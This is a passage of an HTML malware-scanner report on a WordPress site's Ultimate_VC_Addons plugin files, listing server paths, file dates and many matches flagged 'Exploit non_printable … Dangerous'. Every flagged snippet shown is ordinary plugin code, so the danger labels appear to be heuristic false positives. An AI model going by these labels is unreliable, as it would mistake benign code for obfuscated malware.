</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 133</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_boxshadow_param_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #FF8000">/*$mode,*/ </span><span style="color: #0000BB">$unit</span><span style="color: #007700">, </span><span style="color: #FF8000">/* $default_value,*/ </span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 160</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_boxshadow_param_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 36</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_boxshadow_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_482").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Gradient.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.12 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 16</span><br><table id="file_483" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Gradient_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_gradient_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Gradient_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">gradient_pre_defined</span><span style="color: #007700">(</span><span style="color: #0000BB">dependency_element</span><span style="color: #007700">, </span><span style="color: #0000BB">dependency_values_array</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">i</span><span style="color: #007700">,</span><span style="color: #0000BB">opt</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 191</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">stringGradient</span><span style="color: #007700">,</span><span style="color: #0000BB">cssGradient</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 207</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">cssGradient</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uvc_gradient_verfiy_depedant</span><span style="color: #007700">(</span><span style="color: #0000BB">dependency_element</span><span style="color: #007700">, </span><span style="color: #0000BB">dependency_values_array</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 240</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">gradient_picker</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">el</span><span style="color: #007700">) { return </span><span style="color: #0000BB">el</span><span style="color: #007700">; });</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_483").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Image_Single.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_484" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">image_single_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">wp_enqueue_media</span><span style="color: #007700">(); </span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons_image_single_css'</span><span style="color: #007700">, </span><span style="color: #0000BB">UAVC_URL </span><span style="color: #007700">. </span><span style="color: #DD0000">'admin/vc_extend/css/ultimate_image_single.css'</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">ULTIMATE_VERSION </span><span style="color: #007700">); } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">image_single_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">url</span><span style="color: #007700">, array or </span><span style="color: #0000BB">json</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_attachment_url_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_img_single_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_484").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Number.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_485" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Number_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_number_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Number_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">number_settings_field</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_485").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Radio_Image.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_486" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ var </span><span style="color: #0000BB">radio_id </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">parent</span><span style="color: #007700">().</span><span style="color: #0000BB">parent</span><span style="color: #007700">().</span><span style="color: #0000BB">data</span><span style="color: #007700">(</span><span style="color: #DD0000">"uniqid"</span><span style="color: #007700">); var </span><span style="color: #0000BB">val </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">val</span><span style="color: #007700">(); </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#radio_image_setting_val_"</span><span style="color: #007700">+</span><span style="color: #0000BB">radio_id</span><span style="color: #007700">).</span><span style="color: #0000BB">val</span><span style="color: #007700">(</span><span style="color: #0000BB">val</span><span style="color: #007700">); }); </</span><span style="color: #0000BB">script</span><span style="color: #007700">></span><span style="color: #DD0000">'; return $output; } } } if ( class_exists( '</span><span style="color: #0000BB">Ultimate_VC_Addons_Radio_Image_Param</span><span style="color: #DD0000">' ) ) { $ultim</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">radio_image_settings_field</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_486").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Border.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.46 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_487" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">ultimate_border_param_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) { </span><span style="color: #0000BB">wp_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons-border-style'</span><span style="color: #007700">, </span><span style="color: #0000BB">UAVC_URL </span><span style="color: #007700">. </span><span style="color: #DD0000">'admin/vc_extend/css/ultimate_border.css'</span><span style="color: #007700">, </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">ULTIMATE_VERSION </span><span style="color: #007700">); if ( </span><span style="color: #DD0000">'post.php' </span><span style="color: #007700">== </span><span style="color: #0000BB">$hook </span><span style="color: #007700">|| </span><span style="color: #DD0000">'post-new.php' </span><span style="color: #007700">== </span><span style="color: #0000BB">$hook 